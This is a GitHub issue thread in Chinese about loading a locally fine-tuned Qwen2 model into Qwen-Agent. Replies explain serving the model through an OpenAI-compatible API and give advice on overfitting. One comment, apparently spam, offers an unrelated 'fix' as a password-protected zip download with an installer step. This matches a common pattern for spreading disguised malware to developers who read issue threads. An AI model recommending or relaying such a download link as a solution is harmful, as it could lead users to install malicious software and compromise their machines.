### ISSUE TITLE
请问qwen agent如何加载本地模型

### ISSUE THREAD

**Issue by liguoyu666** [QwenLM/Qwen-Agent#322]
我用lora微调了qwen2模型，保存在本地，想使用qwen agent，但是不会加载微调后的模型，哪怕是加载保存在本地的qwen原始模型也不行。

def init_agent_service():
    llm_cfg = {'model': r'./model/Qwen2-0.5B',
               'model_server':'http://127.0.0.1:11434/v1',
               'generate_cfg':{
                   'top_p':0.8
                    }
               }
    system = ('我们来玩角色扮演游戏。你扮演用户的女友。由用户开始发言，根据他的发言，你初始化一个心情值（0到100）并作出回应。'
              '用户的任务是哄你开心，你根据每次用户说的话调整心情，每次回复开头加上（当前心情：分数）。')

    bot = Assistant(llm=llm_cfg, name='虚拟女友', description='哄哄机器人', system_message=system)
    return bot

我将model的值改为本地模型地址，'model': r'./model/Qwen2-0.5B'`
报错：
qwen_agent.llm.base.ModelServiceError: Error code: 404 - {'error': {'message': 'model "./model/Qwen2-0.5B" not found, try pulling it first', 'type': 'api_error', 'param': None, 'code': None}}

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JianxinMa** [comment]
需要将微调的模型启动为OpenAI API兼容的方式（比如通过vllm启动）后接入。市面上不少微调框架都有提供OpenAI API兼容接口。

**Comment by liguoyu666** [comment]
> 需要将微调的模型启动为OpenAI API兼容的方式（比如通过vllm启动）后接入。市面上不少微调框架都有提供OpenAI API兼容接口。

谢谢，另外再请教一个问题，我用qlora微调qwen-0.5b模型，训练"all-linear"层，数据几十条，epoch跑了上百，train_loss已经降到0.001以下了，但是使用起来效果很差，给我的感觉是没学到新的知识，如果只是用几条数据训练，训练出来，效果就很好，可能过拟合了，请问下用qlora训练效果差可能是啥原因

**Comment by JianxinMa** [comment]
> > 需要将微调的模型启动为OpenAI API兼容的方式（比如通过vllm启动）后接入。市面上不少微调框架都有提供OpenAI API兼容接口。
> 
> 谢谢，另外再请教一个问题，我用qlora微调qwen-0.5b模型，训练"all-linear"层，数据几十条，epoch跑了上百，train_loss已经降到0.001以下了，但是使用起来效果很差，给我的感觉是没学到新的知识，如果只是用几条数据训练，训练出来，效果就很好，可能过拟合了，请问下用qlora训练效果差可能是啥原因

LLM模型微调一般不建议上百epochs，通常主流都是个位数epochs。如果手头的数据比较少的话，一般建议混合 较多的开源通用数据 +较少的私有数据 来微调。开源数据在 llamafactory 等微调框架的 readme 里可以找到，也可以读读微调相关的论文看其他人一般用什么。

**Comment by liguoyu666** [comment]
> > > 需要将微调的模型启动为OpenAI API兼容的方式（比如通过vllm启动）后接入。市面上不少微调框架都有提供OpenAI API兼容接口。
> > 
> > 
> > 谢谢，另外再请教一个问题，我用qlora微调qwen-0.5b模型，训练"all-linear"层，数据几十条，epoch跑了上百，train_loss已经降到0.001以下了，但是使用起来效果很差，给我的感觉是没学到新的知识，如果只是用几条数据训练，训练出来，效果就很好，可能过拟合了，请问下用qlora训练效果差可能是啥原因
> 
> LLM模型微调一般不建议上百epochs，通常主流都是个位数epochs。如果手头的数据比较少的话，一般建议混合 较多的开源通用数据 +较少的私有数据 来微调。开源数据在 llamafactory 等微调框架的 readme 里可以找到，也可以读读微调相关的论文看其他人一般用什么。

谢谢大佬指点
